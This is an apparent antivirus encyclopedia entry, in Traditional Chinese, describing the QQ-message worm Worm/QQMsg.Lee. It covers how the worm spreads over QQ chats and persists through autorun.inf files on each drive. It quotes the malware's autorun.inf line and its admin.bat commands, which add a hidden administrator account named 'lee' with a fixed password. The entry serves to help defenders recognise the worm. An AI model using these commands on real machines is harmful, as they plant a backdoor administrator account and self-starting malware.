描述
Worm/QQMsg.Lee
病毒類型:蠕蟲
病毒大小:204859,204865位元組
傳播方式:網路
編譯版本:VCdebug
QQ訊息病毒Worm/QQMsg.Lee與以往的病毒類似,只是傳送廣告信息。病毒自動運行方式不同於傳統修改註冊表啟動項,而是創建了autorun.inf自運行檔案,打開盤符後會自動運行,原理與自啟動光碟相同。
具體技術特徵如下:
1. 病毒運行後在各個盤的根目錄下創建隱含檔案:
system32.exe, 204859位元組
system32dll.dll, 204865位元組
admin.bat, 71位元組
autorun.inf, 28位元組
其中autorun.inf的內容為:
【autorun】
open=System32.exe
使得每當打開盤符後病毒自動運行。病毒的這種方法區別於一般的修改註冊表啟動項的方法,更加隱蔽。
2.病毒運行後會監視qq聊天視窗,一旦發現則向對方傳送病毒網址
3. 病毒運行後產生的admin.bat內容為:
net user lee abcd1234!@# /add
net localgroup administrators lee /add
病毒將增加一個名為lee的用戶,密碼為abcd1234!@#,然後將之加入管理員組。
註:
%Windir%為變數,一般為C:\Windows 或 C:\Winnt;
%System%為變數,一般為C:\Windows\System (Windows 95/98/Me),
C:\Winnt\System32 (Windows NT/2000),
或 C:\Windows\System32 (Windows XP)。